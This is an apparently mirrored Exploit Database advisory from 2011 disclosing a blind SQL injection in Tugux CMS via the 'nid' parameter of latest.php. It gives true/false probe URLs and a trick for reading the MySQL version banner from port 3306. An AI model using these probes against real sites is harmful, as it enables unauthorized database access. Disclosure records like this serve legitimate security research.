Tugux CMS – ‘nid’ Blind SQL Injection

• Exploit Database
• 16 阅读

• 作者： eidelweiss
  日期： 2011-03-18
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17000/

• ===================================================================
  Tugux CMS (nid) BLIND sql injection vulnerability
  ===================================================================
   
  Software: Tugux CMS
  Vendor: www.tugux.com
  Vuln Type:BLind SQL Injection
  Download link:http://sourceforge.net/projects/tuguxcms/files/tuguxCMS_v.1.0_final.rar/download
  Author: eidelweiss
  contact:eidelweiss[at]windowslive[dot]com
  Home: www.eidelweiss.info
   
   
  References: http://eidelweiss-advisories.blogspot.com/2011/03/tugux-cms-nid-blind-sql-injection.html
   
   
  ===================================================================
   
  exploit & p0c
   
  [!] latest.php?nid=[valid nid]
   
  Example p0c
   
  [!] http://server/latest.php?nid=9<= True
  [!] http://server/latest.php?nid=-9 <= False
   
  [+] http://server:3306<= download the file , save and open with c++ or wordpad will show mysql version
   
  [!] sample: http://server:3306 result : 5.0.92-community (use versi 5.0.92) :D
   
   
  ====================================================================
   
  Nothing Impossible In This World Even Nobody`s Perfect
   
  ===================================================================
   
  ==========================| -=[ E0F ]=- |==========================